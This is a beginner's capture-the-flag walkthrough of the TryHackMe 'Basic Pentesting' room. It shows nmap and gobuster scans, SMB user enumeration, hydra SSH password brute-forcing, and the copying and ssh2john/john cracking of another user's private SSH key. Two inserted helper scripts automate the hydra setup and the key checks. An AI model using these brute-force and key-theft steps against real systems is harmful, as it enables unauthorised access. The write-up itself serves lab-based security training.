InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/


TryHackMe: Basic Pentesting


INTRODUCTION

Hola folks!! Naman Jain here with my first walkthrough write-up, so please ignore any mistakes in grammar/spelling, lol XD.

Since this is my first CTF ever, I decided to watch some tutorials on YouTube. I was aware that John Hammond uploads THM videos, so I jumped right there and watched a few of them, then waited so that when I did the room I wouldn't remember how he solved it. I tried it 3–4 days after watching the videos, but I did remember some of the key points.

Not to take too long, so without further ado, let's root into Basic Pentesting.

Web App Testing and Privilege Escalation

So for the initial phase, let's start with what everybody begins with: Nmap.

nmap -sC -sV -oN nmap <ip>
Sorry, forgot to take an Nmap screenshot ;p

Now it's time for some directory brute-forcing:

gobuster dir -w <wordlist> -u http://<ip>

As you can see, there's a directory named 'development'.

After checking it a bit, it doesn't seem to be useful, so let's go further.

Now let's enumerate the host over SMB. For that I use enum4linux (yes, I did remember this from the videos XD):

enum4linux -a <ip> | tee enum4linux.txt

And bingo, we found two users.

After knowing the username, what will you do?

Yes, I did the same: SSH brute-forcing. I used hydra for that:

hydra -l jan -P <wordlist> ssh://<ip>

Try connecting…
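The enumeration steps above (enum4linux, then hydra against the users it reports) chain together naturally, and the hydra flags are easy to get wrong: lowercase -l/-p take a single literal login/password, uppercase -L/-P take files. The script below is an added example, not code from the write-up or from the room, that pulls usernames out of an enum4linux -a log and builds the corresponding hydra command. The log lines, the 10.10.10.10 address and the rockyou.txt path are constructed assumptions, not output from this box.

```shell
#!/usr/bin/env bash
# Added example: turn an enum4linux -a log into a user list for hydra.
# enum4linux reports users in two shapes, depending on which query succeeded:
#   user:[jan] rid:[0x3e8]                       (enumdomusers)
#   S-1-22-1-1000 Unix User\jan (Local User)     (RID cycling)
# The sample log further down is constructed, not captured from the room.

# Print every username found in the log, one per line, de-duplicated.
extract_users() {
    local logfile="$1"
    {
        sed -n 's/^user:\[\([^]]*\)\].*/\1/p' "$logfile"
        sed -n 's/^S-1-[0-9-]* Unix User\\\([^ ]*\) (Local User).*/\1/p' "$logfile"
    } | sort -u
}

# Print the hydra invocation for a user list and a password list.
# -L/-P read files; -l/-p are single literals, so "hydra -p jan" would have
# tried "jan" as a *password* rather than as the login name.
build_hydra_cmd() {
    local users="$1" wordlist="$2" target="$3"
    # -t 4: sshd limits unauthenticated connections (MaxStartups); with the
    # default 16 tasks hydra drops attempts and reports false negatives.
    printf 'hydra -L %s -P %s -t 4 ssh://%s\n' "$users" "$wordlist" "$target"
}

# --- constructed demo input (assumed values, not from the room) ---
log=$(mktemp)
cat > "$log" <<'EOF'
 =================================( Users on 10.10.10.10 )=================================
user:[kay] rid:[0x3e8]
user:[jan] rid:[0x3e9]
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
EOF

users=$(mktemp)
extract_users "$log" > "$users"
cat "$users"                                   # jan and kay, one per line
build_hydra_cmd "$users" /usr/share/wordlists/rockyou.txt 10.10.10.10
```

Feed the printed command to a shell once you are happy with it; the functions are kept separate so the parsing can be checked against a saved log before any connections are made.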

After searching around a bit, we find that there's another user's directory in /home, i.e. kay.

I looked around and found nothing useful (but I did remember that something must be found here). Then I used linPEAS (a tool for finding privilege-escalation paths) and found this:

Then I quickly searched for it and remembered that, yeah, I had missed this.

I quickly copied the .ssh files to my local machine and tried to connect as the user 'kay':

ssh -i id_rsa kay@<ip>

And now it's asking for a passphrase :(

For this, ssh2john will come in handy:

ssh2john id_rsa > kayssh
john --wordlist=<wordlist> kayssh

And voilà!! We found the passphrase:

Tried to log in…… Success…… and congrats!!
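Two things trip people up at the "copy the key and ssh -i" step above: ssh refuses a private key whose file mode is looser than 0600, and ssh2john/john are only needed when the key is actually passphrase-protected. The script below is an added example, not the author's commands or anything from the room, that fixes the mode and reports whether a passphrase is needed by reading the key header. Legacy PEM keys announce encryption with a "Proc-Type: 4,ENCRYPTED" line; OpenSSH-format keys record a cipher name inside the base64 payload, "none" when stored in plaintext. The key files created in the demo are constructed header-only stubs, not the key from the box.

```shell
#!/usr/bin/env bash
# Added example: prepare a private key copied off a target before "ssh -i".
# The keys created below are constructed stubs (header bytes only), not the
# room's id_rsa.

# Print the cipher name from an OpenSSH-format key's header.
# Payload layout: "openssh-key-v1\0", uint32 length, cipher name,
# uint32 length, KDF name, ...  A plaintext key uses cipher "none".
openssh_cipher() {
    grep -v -- '-----' "$1" | base64 -d 2>/dev/null | head -c 64 \
        | tail -c +20 | LC_ALL=C tr -c '[:print:]' '\n' | head -n1
}

# Exit 0 if the key needs a passphrase, 1 if it can be used as-is.
key_is_encrypted() {
    local key="$1"
    # legacy PEM format announces encryption with a header line
    if grep -q '^Proc-Type: 4,ENCRYPTED' "$key"; then
        return 0
    fi
    # OpenSSH format hides it in the base64 payload
    if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$key"; then
        [ "$(openssh_cipher "$key")" != "none" ]
        return
    fi
    return 1
}

# Fix permissions (ssh ignores keys readable by group/others) and say what
# the next step is.
prep_key() {
    local key="$1"
    chmod 600 "$key"
    if key_is_encrypted "$key"; then
        echo encrypted    # ssh2john "$key" > hash && john --wordlist=<wordlist> hash
    else
        echo plaintext    # ssh -i "$key" user@host works directly
    fi
}

# --- constructed demo keys: only the header fields the check reads ---
fake_key_plain() {
    echo '-----BEGIN OPENSSH PRIVATE KEY-----'
    printf 'openssh-key-v1\0\0\0\0\004none\0\0\0\004none' | base64
    echo '-----END OPENSSH PRIVATE KEY-----'
}
fake_key_encrypted() {
    echo '-----BEGIN OPENSSH PRIVATE KEY-----'
    printf 'openssh-key-v1\0\0\0\0\012aes256-ctr\0\0\0\006bcrypt' | base64
    echo '-----END OPENSSH PRIVATE KEY-----'
}
fake_key_pem_encrypted() {
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
        'DEK-Info: AES-128-CBC,00' '-----END RSA PRIVATE KEY-----'
}

demo=$(mktemp -d)
fake_key_plain         > "$demo/id_rsa_plain"
fake_key_encrypted     > "$demo/id_rsa_openssh"
fake_key_pem_encrypted > "$demo/id_rsa_pem"
for k in "$demo"/id_rsa_*; do
    printf '%s: %s\n' "$(basename "$k")" "$(prep_key "$k")"
done
```

Run prep_key on the copied id_rsa before spending time on john: if it reports plaintext, the passphrase prompt was never the problem and a wrong file mode or a mismatched username is the thing to check.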

So that’s all for this room.

If you liked this, then support me by sharing it and giving a clap :)

signing off, Peace 🤞



Written by Naman Jain

Security Researcher @Credshields | Smart Contract Auditor
